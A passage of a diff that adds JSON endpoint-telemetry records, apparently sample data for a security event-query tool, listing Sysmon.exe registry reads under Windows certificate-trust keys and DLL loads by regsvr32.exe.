131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": 
"CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "amsi.dll", + "image_path": "C:\\Windows\\System32\\amsi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", + "registry_value": "SyncRootManager", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 
131883573240890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "Windows.StateRepositoryPS.dll", + "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "MpOAV.dll", + "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpOAV.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cldapi.dll", + "image_path": "C:\\Windows\\System32\\cldapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + 
"timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, 